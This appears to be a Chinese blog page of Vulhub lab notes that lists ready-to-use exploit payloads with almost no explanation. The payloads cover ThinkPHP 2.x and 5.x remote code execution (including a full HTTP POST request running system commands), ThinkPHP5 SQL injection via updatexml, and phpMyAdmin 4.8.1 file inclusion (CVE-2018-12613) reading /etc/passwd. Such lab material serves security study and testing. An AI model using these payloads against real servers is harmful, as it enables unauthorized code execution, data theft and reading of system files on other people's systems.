抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

vulhub

ThinkPHP 2.x 任意代码执行漏洞

1
访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo()

Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability

1
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

ThinkPHP5 5.0.23 Remote Code Execution Vulnerability

1
2
3
4
5
6
7
8
9
10
11
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability

1
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

1
http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

评论